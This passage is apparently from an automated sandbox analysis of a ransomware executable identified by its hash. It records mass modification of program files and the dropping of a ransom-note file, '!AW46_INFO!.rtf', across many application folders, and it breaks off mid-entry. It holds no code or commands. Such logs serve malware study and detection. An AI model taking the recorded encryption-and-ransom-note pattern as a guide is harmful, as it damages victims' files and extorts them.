7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome_pwa_launcher.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\fonts\TwemojiMozilla.ttf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench_1.2.1.v20140901-1244.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.util_1.0.500.v20130404-1337.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Port_of_Spain 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\fonts\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ja_JP.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Enderbury 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh89 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Recife 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\Africa\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\alt-rt.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mexico_City 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ko.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Nicosia 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CET 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dili 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\README.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Lisbon 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\es-419.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightItalic.ttf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui_4.0.100.v20140401-0608.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Winnipeg 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Brunei 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Zaporozhye 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\uninstall.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Galapagos 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Araguaina 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Majuro 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightDemiItalic.ttf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.resources_3.9.1.v20140825-1431.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MET 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\CompressCompare.vdw 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Manila 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Jamaica 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\tesselate.x3d 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nome 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.SF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Installer\chrome.7z 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Johannesburg 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Tunis 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\jabswitch.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Araguaina 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\DumontDUrville 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yerevan 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_fr.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.oracle.jmc.executable.win32.win32.x86_64_5.5.0 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\javaws.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Petersburg 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Installer\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerEvaluators.exsd 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.bidi_0.10.0.v20130327-1442.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Adelaide 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Regina 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jsadebugd.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\cacerts 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-loaders.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft.Office.InfoPath.targets 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\external_extensions.json 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\ij.bat 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Buenos_Aires 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\tnameserv.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Maldives 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\com-sun-tools-visualvm-modules-startup.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Casablanca 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Istanbul 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\LogoCanary.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Menominee 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santa_Isabel 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\SmallLogoCanary.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Journal\PDIALOG.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dubai 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\.eclipseproduct 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyDrop32x32.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.contexts_1.3.100.v20140407-1019.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\hu.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Honolulu 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pago_Pago 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Kerguelen 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\default.jfc 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\extensions\VLSub.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\lt.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Windows Mail\wab.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.zh_CN_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec64.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\dt.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Windhoek 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Azores 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jdwpTransport.h 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Andorra 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program 